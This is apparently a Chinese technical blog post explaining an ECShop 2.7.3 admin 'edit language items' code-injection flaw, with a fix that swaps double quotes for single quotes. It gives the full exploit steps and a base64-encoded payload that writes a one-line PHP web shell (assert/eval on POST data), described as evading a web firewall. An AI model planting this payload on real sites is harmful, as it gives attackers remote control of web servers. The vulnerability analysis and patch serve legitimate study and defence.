admin/edit_languages.php,ecshop后台语言项执行漏洞edit_languages.php详解

最新推荐文章于 2022-09-06 17:46:14 发布
最新推荐文章于 2022-09-06 17:46:14 发布
阅读量239 收藏 2
点赞数
文章标签: admin/edit_languages.php

该漏洞需要能登录ecshop后台权限,简单修改下语言项目,即可在网站植入木马后门。 以下是详细分析 1.登陆到ecshop台后,选择模板管理,语言项编辑,搜索用户信息 为什么要搜索用户

该漏洞需要能登录ecshop后台权限,简单修改下语言项目,即可在网站植入木马后门。 以下是详细分析1.登陆到

e8a7c4df9ac3304941737aca1e440326.png

为什么要搜索“用户信息”,还可以搜索其它的吗?

答案是搜索languages\zh_cn\user.php文件里任何一个变量都可以

de270a5efe5bc9a4697053151ec50dbb.png

2.添加如下后门,将用户信息改为

用户信息${${fputs(fopen(base64_decode(Sm95Q2hvdS5waHA),w),base64_decode(PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))}}

即生成一个JoyChou.php文件,内容为(可以过安全狗的一句话哦):<?php

assert(

$_POST[x]

);

?>

f5179845e248fdad4df3f94efc28813c.png

3.访问user.php即可产生shell(不用注册登录账户)

http://localhost/ECShop_V2.7.3_UTF8_release0411/user.php或http://localhost/ECShop_V2.7.3_UTF8_release0411/languages/zh_cn/user.php

141b466f922f002d885f095bf6252ccc.png漏洞产生原因 在admin\edit_languages.php文件中第120行,修改变量内容,注意是用的双引号。 for ($i = 0; $i count($_POST[item_id]); $i++) { /* 语言项内容如果为空,不修

漏洞产生原因

在admin\edit_languages.php文件中第120行,修改变量内容,注意是用的双引号。for ($i = 0; $i 

{

/* 语言项内容如果为空,不修改 */

if (trim($_POST[‘item_content‘][$i]) == ‘‘)

{

unset($src_items[$i]);

}

else

{

$_POST[‘item_content‘][$i] = str_replace(‘\\\\n‘, ‘\\n‘, $_POST[‘item_content‘][$i]);

/* $_POST[‘item_content‘][$i]是修改后增加的内容,即增加的"用户信息${${fputs(fopen"等内容

$dst_items[$i] 是 $_LANG[‘label_profile‘] = "用户信息${${fputs(fopen";

*/

$dst_items[$i] = $_POST[‘item_id‘][$i] .‘ = ‘. ‘"‘ .$_POST[‘item_content‘][$i]. ‘";‘;

}

}

修改完后文件\languages\zh_cn\user.php变量为:注意是双引号哦$_LANG[‘label_profile‘] = "用户信息${${fputs(fopen(base64_decode(Sm95Q2hvdS5waHA),w),base64_decode(PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))}}";

54c30e9bddbcde5b6926cd15a8b2ed8b.png

由于是双引号,所以只要在任意的php文件中引用这个变量,代码就会成功执行。

至于为什么可以执行?原理如下:

下面这三句话都可以执行,与其说代码执行,不如说参数执行。<?php

$a = "${ phpinfo()}";  // 有一个空格

$b = "{${phpinfo()}}"; // 多一对{},但是没有空格

$c = "{${fputs(fopen("JoyChou.php", "w+"), "<?php  eval(\$_POST[1]);?>")}}";

$d = "asdf{${phpinfo()}}"; // {字符前可以随意加字符串

?>

而http://localhost/ECShop_V2.7.3_UTF8_release0411/user.php这个文件包含\languages\zh_cn\user.php 这个文件,所以也可以代码执行。/* 载入语言文件 */

require_once(ROOT_PATH . ‘languages/‘ .$_CFG[‘lang‘]. ‘/user.php‘);

5. 漏洞修复

了解了漏洞原理后,修复就是一件比较简单的事情,只需将双引号改为单引号

修改\admin\edit_languages.php// 修复前

$dst_items[$i] = $_POST[‘item_id‘][$i] .‘ = ‘. ‘"‘ .$_POST[‘item_content‘][$i]. ‘";‘;

// 修复后,由于想在单引号之间出现单引号,必须使用转义。

$dst_items[$i] = $_POST[‘item_id‘][$i] .‘ = ‘. ‘\‘‘ .$_POST[‘item_content‘][$i]. ‘\‘;‘;

修复后,测试一下,是否还有漏洞。

再次修改“用户信息”内容为之前修改的内容。打开\languages\zh_cn\user.php可以看到变量已经变为了单引号

0d7dec77c0f98a6d2b6da5776e689946.png

补丁下载:

ecshop的category注入漏洞补丁

ecshop支付宝接口注入漏洞补丁

ecshop的lib_api注入漏洞补丁

ecshop的edit_languages代码注入漏洞补丁

Lekecui
关注
ecshop常见漏洞
10-30
ecshop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库;跨站攻击; ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏洞ecshop后台编辑文件/admin/affiliate_ck.php中,对输入参数auid未进行正确类型转义,导致整型注入的发生;ecshop后台编辑文件/admin/shophelp.php中 shopinfo.php ,对输入参数$_POST['id']未进行正确类型转义,导致整型注入的发生;ecshop的/admin/comment_manage.php中,对输入参数sort_by、sort_order未进行严格过滤,导致SQL注入;ECShop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库; ECSHOP支付插件存在SQL注入漏洞,此漏洞存在于/includes/modules/payment/alipay.php文件中,该文件是ECshop的支付宝插件。由于ECShop使用了str_replace函数做字符串替换,黑客可绕过单引号限制构造SQL注入语句。只要开启支付宝支付插件就能利用该漏洞获取网站数据,且不需要注册登入;ecshop的/includes/lib_insert.php文件中,对输入参数未进行正确类型转义,导致整型注入的发生。
ECSHOP /mobile/admin/edit_languages.php
weixin_33918357的博客
01-20 130
  漏洞名称:ecshop代码注入漏洞 补丁编号:10017531 补丁文件:/mobile/admin/edit_languages.php 补丁来源:云盾自研 更新时间:2017-01-05 08:41:29 漏洞描述:ecshop后台模版编译导致黑客可插入任意恶意代码。   else { $_POST['item_con...
admin/edit_languages.php,ECSHOP后台getshell漏洞
weixin_39828457的博客
03-26 227
### 简要描述:ECSHOP 后台getshell### 详细说明:```admin/edit_languages.phpelseif ($_REQUEST['act'] == 'edit'){/* 语言的路径 */$lang_file = isset($_POST['file_path']) ? trim($_POST['file_path']) : '';/* 替换前的语言 */$src...
ECSHOP \admin\edit_languages.php GETSHELL Based On Injection PHP Code Into /languages/zh_cn/user.php
weixin_30763397的博客
11-11 135
目录 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 对于很多CMS网站来说,它们都需要保存很多的网站META信息,最常用的最佳实践是以变量声明的形式保存在.php文件中,在需要的时候直接include进来,PHP File Loader会自动将引入文件中的变量注册到当前的代码空间中,供其他的...
admin/edit_languages.php,ecshop SQL注入漏洞修复 支付漏洞修复
weixin_32237603的博客
03-26 82
ecshop最新SQL注入漏洞,出现在后台管理,涉及到的文件有includes/modules/payment/alipay.php,api/client/includes/lib_api.phpadmin/edit_languages.php 注入漏洞影响到所有包括ecshop,大小京东,大小商创程序以ecshop为内核的程序到目前为止,ecshop官网还未做修复。1.alipay.php ...
ecshop后台操作90个小问题(很常见的问题).txt
02-02
### ecshop后台操作常见90个小问题解析 #### 1. 修改网站“欢迎语” - **操作步骤**:进入 `languages\zh_cn\common.php` 文件,找到并修改 `$_LANG['welcome']` 的值为你想要的欢迎语。 #### 2. 修改页面“关键词...
aaa.rar_593aaa. com_ecshop_www .aaa709.com_www.aaa 647.com_商城
09-24
ECSHOP商城系统深度解析与定制实践》 ECSHOP是一款广泛应用于电子商务领域的开源网上商城系统,以其灵活性、可扩展性和易用性深受众多企业和开发者喜爱。标题中的"aaa.rar_593aaa....
ecshop 后台
04-01
根据提供的描述,“ecshop.电商的最好资料,易于理解,便于开发”,我们可以推断出该文档主要讲解了ecshop后台管理系统的使用方法及开发指南。以下将围绕这几个方面展开详细介绍: ##### 2.1 系统登录与权限设置 ...
ECShop_v3.6.0_UTF8_release170921.zip ECShop商城开源版本下载
10-02
ECShop是中国著名的B2C(Business-to-Consumer)独立网店系统,专为企业和个人提供解决方案,帮助他们快速搭建个性化网上商店。这个系统以其强大的功能、灵活的扩展性和友好的用户体验而受到众多用户的青睐。"ECShop...
ECShop_patch_20170921.zip ECSHOP 3.6最新版升级补丁
04-15
ECShop_patch_20170921.zip ECSHOP 3.6最新版升级补丁
ecshop edit_languages.php,ECSHOP语言库注入漏洞分析和修复
weixin_36296063的博客
04-01 158
1.ECSHOP语言库注入漏洞利用1) 登陆到ecshop台后,选择模板管理,语言编辑,搜索“用户信息”为什么要搜索“用户信息”,还可以搜索其它的吗?答案是搜索languages\zh_cn\user.php文件里任何一个变量都可以2) 添加如下后门,将用户信息改为用户信息${${fputs(fopen(base64_decode(Sm95Q2hvdS5waHA),w),base64_decod...
WebEdit在线编辑器的问题与漏洞(转)
turboking的专栏
04-27 3469
WebEdit在线编辑器的问题与漏洞Ewebeditor编辑器目前分为asp,aspx,php,jsp四种程序,各类ewebeditor版本很多,功能强大颇收使用者喜爱,在国内使用极为广泛。对于目前asp版本的ewebeditor编辑漏洞主要分为以下7点:默认,遍历目录漏洞,一句话,注入,构造,cookie欺骗,社工(踩脚印入侵),NO1.ewebeditor编辑
category.php漏洞,ECShop V2.7.2 category.php SQL Injection Vulnerability
weixin_42151599的博客
04-01 221
### 漏洞代码分析/category.php```..$filter_attr_str = isset($_REQUEST['filter_attr']) ? trim($_REQUEST['filter_attr']) : '0';//变量 $filter_attr_str 是以“.” 分开的数组$filter_attr = empty($filter_attr_str) ? '' : exp...
dedecms织梦留言板edit.inc.php注入漏洞修复
09-06 255
dedecms注入漏洞,路径:/plus/guestbook/edit.inc.php。dedecms留言板edit.inc.php注入漏洞修复方法。打开edit.inc.php文件。在这两行中间加入一行以下代码。
django之全局默认设置查看及admin语言设置
davidlee1214的博客
11-21 259
django之admin语言设置   admin后台管理默认使用的是英文,有时我们需要将其设置成自己的语言以方便使用管理;   将LANGUAGE_CODE = '' 设置为欲设置的语言即可。   以下为django源码中给定的语言可选: # Languages we provide translations for, out of the box. LANGUAGE...
category.php漏洞,phpcms 2008多个漏洞 (可getshell)
weixin_28712661的博客
03-13 490
一个漏洞不可怕,可怕的是一连串的漏洞,拼接起来就可以getshell了。###文件包含define('IN_YP', TRUE);define('ADMIN_ROOT', str_replace("", '/',dirname(__FILE__)).'/');require '../include/common.inc.php';## 要登陆if(!$_userid) showmessage('您...
ecshop后台getshell
qq_45300786的博客
05-14 1515
他所信奉的这盏绿灯,这个一年年在我们眼前渐渐远去的极乐的未来,它从前逃离了我们的追求,不过那没关系,明天我们跑的更快一点,把胳膊伸得更远一点,等待某个美好的早晨,于是我们奋力向前,逆水行舟,直到回到美好往昔的纯真岁月。 现在我们试试第三种方法 访问这个地址, 然后抓包修改为POST,并添加如下框内代码 放包 然后随便找个订单查看 点击“打印订单” 点击“打印订单”后,就会生成一个test.php文件 shell工具连接 ...
127.网络安全渗透测试—[CMS后台 getwebshell]—[ecshop3.6后台 getwebshell]
qwsn
07-11 2840
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 进入后台,访问该页面:抓包,送入repeater模块,改为post模式,把此时请求体的act=edit_templates,放到get处请求体写入以下内容:(写入test.php,密码为a) ,然后点击订单列表—>点击查看—>点击,从而生成test.php蚁剑访问连接...
【fastadmin】如何在edit或add时追加管理员信息
weixin_45816803的博客
03-18 3199
紧接上个博客,客户又提出了新的需求,即需要统计后台专家回复信息条数以及可根据专家账号来查询其回复的信息个数,以用来统计业绩。 操作如下: 首先去修改对应的数据表,追加想要存储的管理员信息字段,此处我添加了admin_id,admin_name两个字段。 fastadmin提供了获取管理员信息的api,此时我们需要找到对应的add.html和edit.html两个文件。路径如下 在html文件中加入如下代码,具体输入框(是否允许修改、是否显示)根据需求来,只需要修改input标签的属性即可。
ECSHOP init.php 文件详解与安全分析
"这篇文档是关于电子商务平台Ecshop中init.php文件的分析,主要探讨了该文件的作用、安全措施以及错误报告级别的配置。" 在Ecshop这个电子商务系统中,init.php是一个非常重要的前台公用文件,它在程序启动时执行,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值